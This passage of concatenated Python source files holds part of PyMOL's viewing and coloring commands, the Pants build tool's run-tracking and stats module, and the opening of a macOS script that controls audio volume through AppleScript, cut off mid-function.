DESCRIPTION
"stereo" activates or deactives stereo mode.
USAGE
stereo [toggle]
ARGUMENTS
toggle = on, off, crosseye, walleye, quadbuffer, sidebyside, geowall, or openvr
EXAMPLES
stereo on
stereo off
stereo crosseye
NOTES
"quadbuffer" is the default stereo mode if hardware stereo is available.
otherwise, "crosseye" is the default.
PYMOL API
cmd.stereo(string toggle)
'''
toggle = stereo_dict[stereo_sc.auto_err(str(toggle),'toggle')]
with _self.lockcm:
return _cmd.stereo(_self._COb, toggle)
def turn(axis, angle, *, _self=cmd):
'''
DESCRIPTION
"turn" rotates the camera about one of the three primary axes,
centered at the origin.
USAGE
turn axis, angle
EXAMPLES
turn x, 90
turn y, 45
PYMOL API
cmd.turn(string axis, float angle)
SEE ALSO
move, rotate, translate, zoom, center, clip
'''
with _self.lockcm:
r = _cmd.turn(_self._COb,str(axis),float(angle))
return r
def full_screen(toggle=-1, *, _self=cmd):
'''
DESCRIPTION
"full_screen" enables or disables full screen mode.
USAGE
full_screen [toggle]
EXAMPLES
full_screen
full_screen on
full_screen off
NOTES
This does not work correctly on all platforms. If you encounter
trouble, try using the maximize button on the viewer window
instead.
'''
toggle = toggle_dict[toggle_sc.auto_err(str(toggle),'toggle')]
with _self.lockcm:
if _self.is_gui_thread():
return _cmd.full_screen(_self._COb,int(toggle))
return _self._do("full_screen %s" % (toggle), echo=0)
def rock(mode=-1, *, _self=cmd):
'''
DESCRIPTION
"rock" toggles Y axis rocking.
USAGE
rock
PYMOL API
cmd.rock()
'''
with _self.lockcm:
r = _cmd.rock(_self._COb,int(mode))
return r
def label(selection="(all)", expression="", quiet=1, *, _self=cmd):
'''
DESCRIPTION
"label" labels one or more atoms in a selection by evaluating an
Python expression referencing properties for each atom.
USAGE
label [ selection [, expression ]]
ARGUMENTS
selection = string: a selection-expression
expression = string: a Python expression that can be converted to a string
EXAMPLES
label chain A, chain
label name CA,"%s-%s" % (resn,resi)
label resi 200,"%1.3f" % partial_charge
NOTES
The symbols defined in the label name space for each atom are:
name, resi, resn, resv, chain, segi, model, alt, q, b, type,
index, rank, ID, ss, vdw, elec_radius, label, elem, geom,
flags, color, cartoon, valence, formal_charge, partial_charge,
numeric_type, text_type, stereo
All strings in the expression must be explicitly quoted.
This operation typically takes several seconds per thousand atoms
labelled.
To clear labels, simply omit the expression or set it to ''.
'''
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
return _cmd.label(_self._COb, selection, expression, quiet)
def label2(selection="(all)", expression="", quiet=1, *, _self=cmd):
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
return _cmd.label2(_self._COb, selection, expression, quiet)
def window(action='show', x=0, y=0, width=0, height=0, *, _self=cmd):
'''
DESCRIPTION
"window" controls the visibility of PyMOL\'s output window
USAGE
window [ action [, x [, y [, width [, height ]]]]]
PYMOL API
cmd.window(string action, int x, int y, int width, int height)
'''
action = window_sc.auto_err(action,'action')
action = window_dict[str(action)]
with _self.lockcm:
from pymol.gui import get_qtwindow as getPyMOLWindow
qt_window = getPyMOLWindow()
if qt_window:
r = DEFAULT_SUCCESS
qt_window.window_cmd(action, int(x),int(y),int(width),int(height))
else:
r = _cmd.window(_self._COb,action,int(x),int(y),int(width),int(height))
return r
def viewport(width=-1,height=-1, *, _self=cmd):
'''
DESCRIPTION
"viewport" changes the size of the graphics display area.
USAGE
viewport width, height
PYMOL API
cmd.viewport(int width, int height)
'''
if cmd.is_string(width) and height == -1:
width = _self.safe_eval(width)
if _self.is_sequence(width):
colorprinting.warning(" Warning: Tuple-syntax (parentheses) "
"for viewport is deprecated")
width, height = width
if not cmd.is_gui_thread():
_self.do("viewport %d,%d"%(int(width),int(height)),0)
return None
with _self.lockcm:
return _cmd.viewport(_self._COb, int(width), int(height))
def bg_color(color="black", *, _self=cmd):
'''
DESCRIPTION
"bg_color" sets the background color.
USAGE
bg_color [ color ]
ARGUMENTS
color = string: color name or number {default: black}
EXAMPLES
bg_color grey30
bg_color
NOTES
To obtain a transparent background, "unset opaque_background", and
then use "ray".
SEE ALSO
set_color, ray
PYMOL API
cmd.bg_color(string color)
'''
color = _self._interpret_color(_self,color)
with _self.lockcm:
r = _cmd.bg_color(_self._COb,str(color))
return r
cartoon_dict = {
'skip' : -1,
'automatic' : 0,
'loop' : 1,
'rectangle' : 2,
'oval' : 3,
'tube' : 4,
'arrow' : 5,
'dumbbell' : 6,
'putty' : 7,
'dash' : 8,
}
cartoon_sc = Shortcut(cartoon_dict.keys())
def cartoon(type, selection="(all)", *, _self=cmd):
'''
DESCRIPTION
"cartoon" changes the default cartoon representation for a set of atoms.
USAGE
cartoon type, selection
ARGUMENTS
type = automatic, skip, loop, rectangle, oval, tube, arrow, dumbbell
PYMOL API
cmd.cartoon(string type, string selection)
EXAMPLES
cartoon rectangle, chain A
cartoon skip, resi 145-156
NOTES
This command is rarely required since the default "automatic" mode
chooses cartoons according to the information in the PDB HELIX and
SHEET records.
'''
# preprocess selection
selection = selector.process(selection)
#
type = cartoon_dict[cartoon_sc.auto_err(str(type),'type')];
with _self.lockcm:
return _cmd.cartoon(_self._COb, selection, int(type))
def _ray(width,height,antialias,angle,shift,renderer,quiet,_self=cmd):
r = DEFAULT_ERROR
try:
_self.lock_without_glut()
try:
_cmd.set_busy(_self._COb,1)
r = _cmd.render(_self._COb,int(width),int(height),
int(antialias),
float(angle),
float(shift),int(renderer),
int(quiet))
finally:
_cmd.set_busy(_self._COb,0)
finally:
_self.unlock(r)
return r
def capture(quiet=1, *, _self=cmd):
_self.draw(antialias=-2,quiet=quiet)
def draw(width=0, height=0, antialias=-1, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"draw" creates an OpenGL-based image of the current frame.
USAGE
draw [width [,height [,antialias ]]]
ARGUMENTS
width = integer {default: 0 (current)}
height = integer {default: 0 (current)}
antialias = integer {default: -1 (use antialias setting)}
EXAMPLES
draw
draw 1600
NOTES
Default width and height are taken from the current viewpoint. If
one is specified but not the other, then the missing value is
scaled so as to preserve the current aspect ratio.
Because this feature uses the OpenGL rendering context to piece
together the image, it does not work when running in the
command-line only mode.
On certain graphics hardware, "unset opaque_background" followed
by "draw" will produce an image with a transparent background.
However, better results can usually be obtained using "ray".
PYMOL API
cmd.draw(int width, int height, int antialias, int quiet)
SEE ALSO
ray, png, save
'''
# stop movies and sculpting if they're on...
if _self.get_movie_playing():
_self.mstop()
if _self.get_setting_boolean("sculpting"):
_self.set("sculpting","off",quiet=1)
# make sure that there aren't any pending display events
# TODO breaks QOpenGLWidget
# _self.refresh()
#
with _self.lockcm:
r = _cmd.draw(_self._COb,int(width),int(height),
int(antialias),int(quiet))
return r
def ray(width=0, height=0, antialias=-1, angle=0.0, shift=0.0,
renderer=-1, quiet=1, async_=0, _self=cmd, **kwargs):
'''
DESCRIPTION
"ray" creates a ray-traced image of the current frame. This
can take some time (up to several minutes, depending on image
complexity).
USAGE
ray [width [,height [,antialias [,angle [,shift [,renderer [,quiet
[,async ]]]]]]]]]
ARGUMENTS
width = integer {default: 0 (current)}
height = integer {default: 0 (current)}
antialias = integer {default: -1 (use antialias setting)}
angle = float: y-axis rotation for stereo image generation
{default: 0.0}
shift = float: x-axis translation for stereo image generation
{default: 0.0}
renderer = -1, 0, 1, or 2: respectively, default, built-in,
pov-ray, or dry-run {default: 0}
async = 0 or 1: should rendering be done in a background thread?
EXAMPLES
ray
ray 1024,768
ray renderer=2
NOTES
Default width and height are taken from the current viewpoint. If
one is specified but not the other, then the missing value is
scaled so as to preserve the current aspect ratio.
angle and shift can be used to generate matched stereo pairs
renderer = 1 uses PovRay. This is Unix-only and you must have
"povray" in your path. It utilizes two two temporary files:
"tmp_pymol.pov" and "tmp_pymol.png".
See "help faster" for optimization tips with the builtin renderer.
See "help povray" for how to use PovRay instead of PyMOL\'s
built-in ray-tracing engine.
PYMOL API
cmd.ray(int width, int height, int antialias, float angle,
float shift, int renderer, int quiet, int async)
SEE ALSO
draw, png, save
'''
async_ = int(kwargs.pop('async', async_))
if kwargs:
raise pymol.CmdException('unknown argument: ' + ', '.join(kwargs))
arg_tup = (int(width),int(height),
int(antialias),float(angle),
float(shift),int(renderer),int(quiet),_self)
# stop movies, rocking, and sculpting if they're on...
if _self.get_movie_playing():
_self.mstop()
if _self.get_setting_boolean("sculpting"):
_self.set("sculpting","off",quiet=1)
if _self.rock(-2)>0:
_self.rock(0)
#
if not async_:
r = _ray(*arg_tup)
else:
render_thread = threading.Thread(target=_ray, args=arg_tup)
render_thread.setDaemon(1)
render_thread.start()
r = DEFAULT_SUCCESS
return r
def refresh(_self=cmd):
'''
DESCRIPTION
"refresh" causes the scene to be redrawn as soon as the operating
system allows it to be done.
USAGE
refresh
PYMOL API
cmd.refresh()
SEE ALSO
rebuild
'''
with _self.lockcm:
if _self.is_gui_thread():
return _cmd.refresh_now(_self._COb)
return _self._do("_ cmd._refresh()")
def reset(object='', *, _self=cmd):
'''
DESCRIPTION
"reset" restores the rotation matrix to identity, sets the origin
to the center of mass (approx.) and zooms the window and clipping
planes to cover all objects. Alternatively, it can reset object
matrices.
USAGE
reset [ object ]
PYMOL API
cmd.reset()
'''
with _self.lockcm:
return _cmd.reset(_self._COb, str(object))
def dirty(_self=cmd): # OBSOLETE?
with _self.lockcm:
r = _cmd.dirty(_self._COb)
return r
def meter_reset(_self=cmd):
'''
DESCRIPTION
"meter_reset" resets the frames per secound counter.
USAGE
meter_reset
'''
with _self.lockcm:
r = _cmd.reset_rate(_self._COb)
return r
def load_png(filename, movie=1, stereo=-1, quiet=0, *, _self=cmd):
'''
DESCRIPTION
"load_png" loads and displays a PNG file from disk.
USAGE
load_png filename
NOTES
If the displayed image is too big for the window, it will be
reduced 2-fold repeatedly until it fits.
'''
filename = _self.exp_path(str(filename))
with _self.lockcm:
return _cmd.load_png(_self._COb, filename, int(movie), int(stereo),
int(quiet))
def rebuild(selection='all',representation='everything', *, _self=cmd):
'''
DESCRIPTION
"rebuild" forces PyMOL to recreate geometric objects in
case any of them have gone out of sync.
USAGE
rebuild [selection [, representation ]]
ARGUMENTS
selection = string {default: all}
representation = string: {default: everything}
PYMOL API
cmd.rebuild(string selection, string representation)
SEE ALSO
refresh
'''
selection = selector.process(selection)
representation = repres_sc.auto_err(representation,'representation')
repn = repres[representation];
with _self.lockcm:
return _cmd.rebuild(_self._COb, selection, repn)
def recolor(selection='all', representation='everything', *, _self=cmd):
'''
DESCRIPTION
"recolor" forces reapplication of colors to existing objects.
USAGE
recolor [selection [, representation ]]
ARGUMENTS
selection = string {default: all}
representation = string {default: everything}
NOTES
This command often needs to be executed after "set_color" has been
used to redefine one or more existing colors.
PYMOL API
cmd.recolor(string selection = 'all', string representation = 'everything')
SEE ALSO
color, set_color
'''
selection = selector.process(selection)
representation = repres_sc.auto_err(representation,'representation')
repn = repres[representation];
with _self.lockcm:
return _cmd.recolor(_self._COb, selection, repn)
def color(color, selection="(all)", quiet=1, flags=0, *, _self=cmd):
'''
DESCRIPTION
"color" changes the color of objects or atoms.
USAGE
color color [, selection ]
ARGUMENTS
color = string: color name or number
selection = string: selection-expression or name-pattern
corresponding to the atoms or objects to be colored
{default: (all)}.
NOTES
When using color ramps, the ramp can be used as a color.
PYMOL API
cmd.color(string color, string selection, int quiet)
SEE ALSO
color_deep, set_color, recolor
EXAMPLE
color cyan
color yellow, chain A
'''
# preprocess selection
selection = selector.process(selection)
color = _self._interpret_color(_self,str(color))
with _self.lockcm:
return _cmd.color(_self._COb, str(color), str(selection),
int(flags), int(quiet))
def color_deep(color, name='all', quiet=1, *, _self=cmd):
'''
DESCRIPTION
Unset all object and atom level (not global) color settings and
apply given color.
ARGUMENTS
color = str: color name or number
name = str: object name or pattern {default: all}
SEE ALSO
color, unset_deep
'''
from pymol.menu import rep_setting_lists
_self.unset_deep([s for L in rep_setting_lists for (r, s) in L if s],
name, updates=0, quiet=quiet)
_self.color(color, name, quiet=quiet)
import colorsys
_spectrumany_interpolations = {
'hls': (colorsys.rgb_to_hls, colorsys.hls_to_rgb),
'hsv': (colorsys.rgb_to_hsv, colorsys.hsv_to_rgb),
'rgb': ((lambda *rgb: rgb), (lambda *rgb: rgb)),
}
def spectrumany(expression, colors, selection='(all)', minimum=None,
maximum=None, quiet=1, interpolation='rgb', *, _self=cmd):
'''
DESCRIPTION
Pure python implementation of the spectrum command. Supports arbitrary
color lists instead of palettes and any numerical atom property which
works in iterate as expression.
Non-numeric values (like resn) will be enumerated.
This is not a separate PyMOL command but is used as a fallback in "spectrum".
'''
from . import CmdException
try:
from_rgb, to_rgb = _spectrumany_interpolations[interpolation]
except KeyError:
raise CmdException('interpolation must be one of {}'.format(
list(_spectrumany_interpolations)))
if ' ' not in colors:
colors = palette_colors_dict.get(colors) or colors.replace('_', ' ')
quiet, colors = int(quiet), colors.split()
n_colors = len(colors)
if n_colors < 2:
raise CmdException('please provide at least 2 colors')
col_tuples = [_self.get_color_tuple(i) for i in colors]
if None in col_tuples:
raise CmdException('unknown color')
col_tuples = [from_rgb(*c) for c in col_tuples]
expression = {'pc': 'partial_charge', 'fc': 'formal_charge',
'resi': 'resv'}.get(expression, expression)
if expression == 'count':
e_list = list(range(_self.count_atoms(selection)))
else:
e_list = []
_self.iterate(selection, 'e_list.append(%s)' % (expression), space=locals())
try:
v_list = [float(v) for v in e_list if v is not None]
except (TypeError, ValueError):
if not quiet:
print(' Spectrum: Expression is non-numeric, enumerating values')
v_list = e_list = list(map(sorted(set(e_list)).index, e_list))
if not v_list:
return (0., 0.)
if minimum is None: minimum = min(v_list)
if maximum is None: maximum = max(v_list)
r = minimum, maximum = float(minimum), float(maximum)
if not quiet:
print(' Spectrum: range (%.5f to %.5f)' % r)
val_range = maximum - minimum
if not val_range:
_self.color(colors[0], selection)
return r
e_it = iter(e_list)
def next_color():
v = next(e_it)
if v is None:
return False
v = min(1.0, max(0.0, (float(v) - minimum) / val_range)) * (n_colors - 1)
i = min(int(v), n_colors - 2)
p = v - i
col = [(col_tuples[i+1][j] * p + col_tuples[i][j] * (1.0 - p))
for j in range(3)]
rgb = [int(0xFF * v) for v in to_rgb(*col)]
return 0x40000000 + rgb[0] * 0x10000 + rgb[1] * 0x100 + rgb[2]
_self.alter(selection, 'color = next_color() or color', space=locals())
_self.recolor(selection)
return r
def spectrum(expression="count", palette="rainbow",
selection="(all)", minimum=None, maximum=None,
byres=0, quiet=1, interpolation='rgb', *, _self=cmd):
'''
DESCRIPTION
"spectrum" colors atoms with a spectrum of colors based on an atomic
property.
USAGE
spectrum [expression [, palette [, selection [, minimum [, maximum [, byres ]]]]]]
ARGUMENTS
expression = count, b, q, or pc: respectively, atom count, temperature factor,
occupancy, or partial charge {default: count}
palette = string: palette name or space separated list of colors
{default: rainbow}
selection = string: atoms to color {default: (all)}
minimum = float: {default: None (automatic)}
maximum = float: {default: None (automatic)}
byres = integer: controls whether coloring is applied per-residue {default: 0}
EXAMPLES
spectrum b, blue_red, minimum=10, maximum=50
spectrum count, rainbow_rev, chain A, byres=1
NOTES
Available palettes include:
blue_green blue_magenta blue_red blue_white_green
blue_white_magenta blue_white_red blue_white_yellow blue_yellow
cbmr cyan_magenta cyan_red cyan_white_magenta cyan_white_red
cyan_white_yellow cyan_yellow gcbmry green_blue green_magenta
green_red green_white_blue green_white_magenta green_white_red
green_white_yellow green_yellow green_yellow_red magenta_blue
magenta_cyan magenta_green magenta_white_blue
magenta_white_cyan magenta_white_green magenta_white_yellow
magenta_yellow rainbow rainbow2 rainbow2_rev rainbow_cycle
rainbow_cycle_rev rainbow_rev red_blue red_cyan red_green
red_white_blue red_white_cyan red_white_green red_white_yellow
red_yellow red_yellow_green rmbc yellow_blue yellow_cyan
yellow_cyan_white yellow_green yellow_magenta yellow_red
yellow_white_blue yellow_white_green yellow_white_magenta
yellow_white_red yrmbcg
PYMOL API
def spectrum(string expression, string palette,
string selection, float minimum, float maximum,
int byres, int quiet)
'''
palette_hit = palette_sc.shortcut.get(palette)
if palette_hit:
palette = palette_hit
if not expression.replace('_', '').isalpha() or not palette_hit:
return spectrumany(expression, palette, selection,
minimum, maximum, quiet, interpolation, _self=_self)
(prefix,digits,first,last) = palette_dict[str(palette)]
if (maximum is None) or (minimum is None):
minimum = 0 # signal to auto-adjust levels
maximum = -1
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
r = _cmd.spectrum(_self._COb,str(selection),str(expression),
float(minimum),float(maximum),
int(first),int(last),str(prefix),
int(digits),int(byres),int(quiet))
return r
def set_color(name, rgb, mode=0, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"set_color" defines a new color using the red, green, and blue
(RGB) color components.
USAGE
set_color name, rgb
ARGUMENTS
name = string: name for the new or existing color
rgb = list of numbers: [red, green, blue] each and all in the range
(0.0, 1.0) or (0, 255)
EXAMPLES
set_color red, [ 1.0, 0.0, 0.0 ]
set_color yellow, [ 255, 255, 0 ]
NOTES
PyMOL automatically infers the range based on the input arguments.
It may be necessary to issue "recolor" command in order to force
recoloring of existing objects.
SEE ALSO
recolor
PYMOL API
cmd.set_color(string name, list-of-numbers rgb, int mode )
'''
if isinstance(rgb, (str, bytes)):
rgb = safe_list_eval(rgb)
if not isinstance(rgb, (list, tuple)) or len(rgb) != 3:
raise pymol.CmdException(
"color specification must be a list such as [ 1.0, 0.0, 0.0 ]")
rgb = [float(c) for c in rgb]
if rgb[0] > 1.0 or rgb[1] > 1.0 or rgb[2] > 1.0:
rgb = [c / 0xFF for c in rgb]
with _self.lockcm:
r = _cmd.colordef(_self._COb, str(name), rgb[0], rgb[1], rgb[2],
int(mode), int(quiet))
_self._invalidate_color_sc()
return r
# Aliases for Mother England.
colour = color
set_colour = set_color
bg_colour = bg_color
recolour = recolor
|
run_tracker.py
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import json
import multiprocessing
import os
import sys
import threading
import time
import uuid
from contextlib import contextmanager
import requests
from pants.base.build_environment import get_pants_cachedir
from pants.base.run_info import RunInfo
from pants.base.worker_pool import SubprocPool, WorkerPool
from pants.base.workunit import WorkUnit
from pants.goal.aggregated_timings import AggregatedTimings
from pants.goal.artifact_cache_stats import ArtifactCacheStats
from pants.reporting.report import Report
from pants.stats.statsdb import StatsDBFactory
from pants.subsystem.subsystem import Subsystem
from pants.util.dirutil import relative_symlink, safe_file_dump
class RunTracker(Subsystem):
"""Tracks and times the execution of a pants run.
Also manages background work.
Use like this:
run_tracker.start()
with run_tracker.new_workunit('compile'):
with run_tracker.new_workunit('java'):
...
with run_tracker.new_workunit('scala'):
...
run_tracker.close()
Can track execution against multiple 'roots', e.g., one for the main thread and another for
background threads.
:API: public
"""
options_scope = 'run-tracker'
# The name of the tracking root for the main thread (and the foreground worker threads).
DEFAULT_ROOT_NAME = 'main'
# The name of the tracking root for the background worker threads.
BACKGROUND_ROOT_NAME = 'background'
@classmethod
def subsystem_dependencies(cls):
return (StatsDBFactory,)
@classmethod
def register_options(cls, register):
register('--stats-upload-url', advanced=True, default=None,
help='Upload stats to this URL on run completion.')
register('--stats-upload-timeout', advanced=True, type=int, default=2,
help='Wait at most this many seconds for the stats upload to complete.')
register('--num-foreground-workers', advanced=True, type=int,
default=multiprocessing.cpu_count(),
help='Number of threads for foreground work.')
register('--num-background-workers', advanced=True, type=int,
default=multiprocessing.cpu_count(),
help='Number of threads for background work.')
register('--stats-local-json-file', advanced=True, default=None,
help='Write stats to this local json file on run completion.')
def __init__(self, *args, **kwargs):
"""
:API: public
"""
super(RunTracker, self).__init__(*args, **kwargs)
run_timestamp = time.time()
cmd_line = ' '.join(['pants'] + sys.argv[1:])
# run_id is safe for use in paths.
millis = int((run_timestamp * 1000) % 1000)
run_id = 'pants_run_{}_{}_{}'.format(
time.strftime('%Y_%m_%d_%H_%M_%S', time.localtime(run_timestamp)), millis,
uuid.uuid4().hex)
info_dir = os.path.join(self.get_options().pants_workdir, self.options_scope)
self.run_info_dir = os.path.join(info_dir, run_id)
self.run_info = RunInfo(os.path.join(self.run_info_dir, 'info'))
self.run_info.add_basic_info(run_id, run_timestamp)
self.run_info.add_info('cmd_line', cmd_line)
# Create a 'latest' symlink, after we add_infos, so we're guaranteed that the file exists.
link_to_latest = os.path.join(os.path.dirname(self.run_info_dir), 'latest')
relative_symlink(self.run_info_dir, link_to_latest)
# A lock to ensure that adding to stats at the end of a workunit
# operates thread-safely.
self._stats_lock = threading.Lock()
# Time spent in a workunit, including its children.
self.cumulative_timings = AggregatedTimings(os.path.join(self.run_info_dir,
'cumulative_timings'))
# Time spent in a workunit, not including its children.
self.self_timings = AggregatedTimings(os.path.join(self.run_info_dir, 'self_timings'))
# Hit/miss stats for the artifact cache.
self.artifact_cache_stats = \
ArtifactCacheStats(os.path.join(self.run_info_dir, 'artifact_cache_stats'))
# Log of success/failure/aborted for each workunit.
self.outcomes = {}
# Number of threads for foreground work.
self._num_foreground_workers = self.get_options().num_foreground_workers
# Number of threads for background work.
self._num_background_workers = self.get_options().num_background_workers
# We report to this Report.
self.report = None
# self._threadlocal.current_workunit contains the current workunit for the calling thread.
# Note that multiple threads may share a name (e.g., all the threads in a pool).
self._threadlocal = threading.local()
# For main thread work. Created on start().
self._main_root_workunit = None
# For background work. Created lazily if needed.
self._background_worker_pool = None
self._background_root_workunit = None
# Trigger subproc pool init while our memory image is still clean (see SubprocPool docstring).
SubprocPool.set_num_processes(self._num_foreground_workers)
SubprocPool.foreground()
self._aborted = False
def register_thread(self, parent_workunit):
"""Register the parent workunit for all work in the calling thread.
Multiple threads may have the same parent (e.g., all the threads in a pool).
"""
self._threadlocal.current_workunit = parent_workunit
def is_under_main_root(self, workunit):
"""Is the workunit running under the main thread's root."""
return workunit.root() == self._main_root_workunit
def start(self, report):
"""Start tracking this pants run.
report: an instance of pants.reporting.Report.
"""
self.report = report
self.report.open()
self._main_root_workunit = WorkUnit(run_info_dir=self.run_info_dir, parent=None,
name=RunTracker.DEFAULT_ROOT_NAME, cmd=None)
self.register_thread(self._main_root_workunit)
self._main_root_workunit.start()
self.report.start_workunit(self._main_root_workunit)
def set_root_outcome(self, outcome):
"""Useful for setup code that doesn't have a reference to a workunit."""
self._main_root_workunit.set_outcome(outcome)
@contextmanager
def new_workunit(self, name, labels=None, cmd='', log_config=None):
"""Creates a (hierarchical) subunit of work for the purpose of timing and reporting.
- name: A short name for this work. E.g., 'resolve', 'compile', 'scala', 'zinc'.
- labels: An optional iterable of labels. The reporters can use this to decide how to
display information about this work.
- cmd: An optional longer string representing this work.
E.g., the cmd line of a compiler invocation.
- log_config: An optional tuple WorkUnit.LogConfig of task-level options affecting reporting.
Use like this:
with run_tracker.new_workunit(name='compile', labels=[WorkUnitLabel.TASK]) as workunit:
<do scoped work here>
<set the outcome on workunit if necessary>
Note that the outcome will automatically be set to failure if an exception is raised
in a workunit, and to success otherwise, so usually you only need to set the
outcome explicitly if you want to set it to warning.
:API: public
"""
parent = self._threadlocal.current_workunit
with self.new_workunit_under_parent(name, parent=parent, labels=labels, cmd=cmd,
log_config=log_config) as workunit:
self._threadlocal.current_workunit = workunit
try:
yield workunit
finally:
self._threadlocal.current_workunit = parent
@contextmanager
def new_workunit_under_parent(self, name, parent, labels=None, cmd='', log_config=None):
"""Creates a (hierarchical) subunit of work for the purpose of timing and reporting.
- name: A short name for this work. E.g., 'resolve', 'compile', 'scala', 'zinc'.
- parent: The new workunit is created under this parent.
- labels: An optional iterable of labels. The reporters can use this to decide how to
display information about this work.
- cmd: An optional longer string representing this work.
E.g., the cmd line of a compiler invocation.
Task code should not typically call this directly.
:API: public
"""
workunit = WorkUnit(run_info_dir=self.run_info_dir, parent=parent, name=name, labels=labels,
cmd=cmd, log_config=log_config)
workunit.start()
outcome = WorkUnit.FAILURE # Default to failure we will override if we get success/abort.
try:
self.report.start_workunit(workunit)
yield workunit
except KeyboardInterrupt:
outcome = WorkUnit.ABORTED
self._aborted = True
raise
else:
outcome = WorkUnit.SUCCESS
finally:
workunit.set_outcome(outcome)
self.end_workunit(workunit)
def log(self, level, *msg_elements):
"""Log a message against the current workunit."""
self.report.log(self._threadlocal.current_workunit, level, *msg_elements)
@classmethod
def post_stats(cls, url, stats, timeout=2):
"""POST stats to the given url.
:return: True if upload was successful, False otherwise.
"""
def error(msg):
# Report aleady closed, so just print error.
print('WARNING: Failed to upload stats to {} due to {}'.format(url, msg),
file=sys.stderr)
return False
# TODO(benjy): The upload protocol currently requires separate top-level params, with JSON
# values. Probably better for there to be one top-level JSON value, namely json.dumps(stats).
# But this will first require changing the upload receiver at every shop that uses this
# (probably only Foursquare at present).
params = {k: json.dumps(v) for (k, v) in stats.items()}
try:
r = requests.post(url, data=params, timeout=timeout)
if r.status_code != requests.codes.ok:
return error("HTTP error code: {}".format(r.status_code))
except Exception as e: # Broad catch - we don't want to fail the build over upload errors.
return error("Error: {}".format(e))
return True
@classmethod
def write_stats_to_json(cls, file_name, stats):
"""Write stats to a local json file.
:return: True if successfully written, False otherwise.
"""
params = json.dumps(stats)
try:
with open(file_name, 'w') as f:
f.write(params)
except Exception as e: # Broad catch - we don't want to fail in stats related failure.
print('WARNING: Failed to write stats to {} due to Error: {}'.format(file_name, e),
file=sys.stderr)
return False
return True
def store_stats(self):
"""Store stats about this run in local and optionally remote stats dbs."""
stats = {
'run_info': self.run_info.get_as_dict(),
'cumulative_timings': self.cumulative_timings.get_all(),
'self_timings': self.self_timings.get_all(),
'artifact_cache_stats': self.artifact_cache_stats.get_all(),
'outcomes': self.outcomes
}
# Dump individual stat file.
# TODO(benjy): Do we really need these, once the statsdb is mature?
stats_file = os.path.join(get_pants_cachedir(), 'stats',
'{}.json'.format(self.run_info.get_info('id')))
safe_file_dump(stats_file, json.dumps(stats))
# Add to local stats db.
StatsDBFactory.global_instance().get_db().insert_stats(stats)
# Upload to remote stats db.
stats_url = self.get_options().stats_upload_url
if stats_url:
t = threading.Thread(target=self.post_stats, args=(stats_url, stats, self.get_options().stats_upload_timeout))
t.start()
# Write stats to local json file.
stats_json_file_name = self.get_options().stats_local_json_file
if stats_json_file_name:
self.write_stats_to_json(stats_json_file_name, stats)
_log_levels = [Report.ERROR, Report.ERROR, Report.WARN, Report.INFO, Report.INFO]
def end(self):
"""This pants run is over, so stop tracking it.
Note: If end() has been called once, subsequent calls are no-ops.
:return: 0 for success, 1 for failure.
"""
if self._background_worker_pool:
if self._aborted:
self.log(Report.INFO, "Aborting background workers.")
self._background_worker_pool.abort()
else:
self.log(Report.INFO, "Waiting for background workers to finish.")
self._background_worker_pool.shutdown()
self.end_workunit(self._background_root_workunit)
self.shutdown_worker_pool()
# Run a dummy work unit to write out one last timestamp.
with self.new_workunit("complete"):
pass
self.end_workunit(self._main_root_workunit)
outcome = self._main_root_workunit.outcome()
if self._background_root_workunit:
outcome = min(outcome, self._background_root_workunit.outcome())
outcome_str = WorkUnit.outcome_string(outcome)
log_level = RunTracker._log_levels[outcome]
self.log(log_level, outcome_str)
if self.run_info.get_info('outcome') is None:
# If the goal is clean-all then the run info dir no longer exists, so ignore that error.
self.run_info.add_info('outcome', outcome_str, ignore_errors=True)
self.report.close()
self.store_stats()
return 1 if outcome in [WorkUnit.FAILURE, WorkUnit.ABORTED] else 0
def end_workunit(self, workunit):
self.report.end_workunit(workunit)
path, duration, self_time, is_tool = workunit.end()
# These three operations may not be thread-safe, and workunits may run in separate threads
# and thus end concurrently, so we want to lock these operations.
with self._stats_lock:
self.cumulative_timings.add_timing(path, duration, is_tool)
self.self_timings.add_timing(path, self_time, is_tool)
self.outcomes[path] = workunit.outcome_string(workunit.outcome())
def get_background_root_workunit(self):
if self._background_root_workunit is None:
self._background_root_workunit = WorkUnit(run_info_dir=self.run_info_dir, parent=None,
name='background', cmd=None)
self._background_root_workunit.start()
self.report.start_workunit(self._background_root_workunit)
return self._background_root_workunit
def background_worker_pool(self):
if self._background_worker_pool is None: # Initialize lazily.
self._background_worker_pool = WorkerPool(parent_workunit=self.get_background_root_workunit(),
run_tracker=self,
num_workers=self._num_background_workers)
return self._background_worker_pool
def shutdown_worker_pool(self):
"""Shuts down the SubprocPool.
N.B. This exists only for internal use and to afford for fork()-safe operation in pantsd.
"""
SubprocPool.shutdown(self._aborted)
|
receiver.py
|
import serial
import asyncio
import multiprocessing
import subprocess
import sys
import glob
import json
import applescript
def setVolume(v):
subprocess.call(["osascript", "-e set volume output volume "+ str(v)])
return v
def inc_SC(n=1):
applescript.tell.app('System Events', 'tell process "SoundSource" to perform action "AXIncrement" of slider 1 of UI element '+str(n)+' of window 1')
def dec_SC(n=1):
applescript.tell.app('System Events', 'tell process "SoundSource" to perform action "AXDecrement" of slider 1 of UI element '+str(n)+' of window 1')
def translate(value, leftMin, leftMax, rightMin, rightMax):
# Figure out how 'wide' each range is
leftSpan = leftMax - leftMin
rightSpan = rightMax - rightMin
# Convert the left range into a 0-1 range (float)
valueScaled = float(value - leftMin) / float(leftSpan)
# Convert the 0-1 range into a value in the right range.
return rightMin + (valueScaled * rightSpan)
def set_TB_Vol(v):
v = translate(v, 0, 100, -16, 16)
applescript.tell.app('System Events', 'tell process "Tonebridge Guitar Effects" to tell window "Tonebridge Guitar Effects" to tell splitter group 1 to set value of slider 2 to '+str(v))
def set_TB_FX(v):
v = translate(v, 0, 100, -16, 16)
applescript.tell.app('System Events', 'tell process "Tonebridge Guitar Effects" to tell window "Tonebridge Guitar Effects" to tell splitter group 1 to set value of slider 1 to '+str(v))
def serial_ports():
""" Lists serial port names
:raises EnvironmentError:
On unsupported or unknown platforms
:returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'):
